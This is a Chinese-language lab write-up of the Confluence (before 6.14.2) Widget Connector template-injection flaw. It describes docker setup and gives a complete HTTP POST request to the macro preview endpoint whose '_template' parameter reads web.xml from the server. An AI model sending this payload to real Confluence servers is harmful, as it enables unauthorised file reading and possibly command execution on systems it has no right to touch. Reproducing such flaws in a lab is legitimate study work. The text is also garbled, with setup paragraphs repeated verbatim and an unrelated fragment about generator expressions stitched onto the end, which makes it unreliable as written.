漏洞描述
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于 Web 的企业 wiki。
Atlassian Confluence 6.14.2 版本之前存在一个未经授权的目录遍历漏洞,攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令。
漏洞环境及漏洞利用
启动docker环境
环境启动后,访问,您将看到安装指南,选择“试用安装”,然后系统会要求您填写许可证密钥。您应该向 Atlassian 申请 Confluence Server 测试证书:http://your-ip:8090
然后只需单击“下一步”即可安装。小内存VPS这一步可能无法安装或耗时较长(建议使用4G以上内存的机器进行安装测试),请耐心等待。
如果系统提示填写群集节点,则可以用 填充路径。/home/confluence
然后只需单击“下一步”即可安装。小内存VPS这一步可能无法安装或耗时较长(建议使用4G以上内存的机器进行安装测试),请耐心等待。
如果系统提示填写群集节点,则可以用 填充路径。/home/confluence
如此配置即可,账号密码都为postgres
完成所有配置看到以下画面
burp发送payload即可验证漏洞
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 177
{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"./web.xml"}}}
和生成器表达式(Generator Expressions)详解)
)
)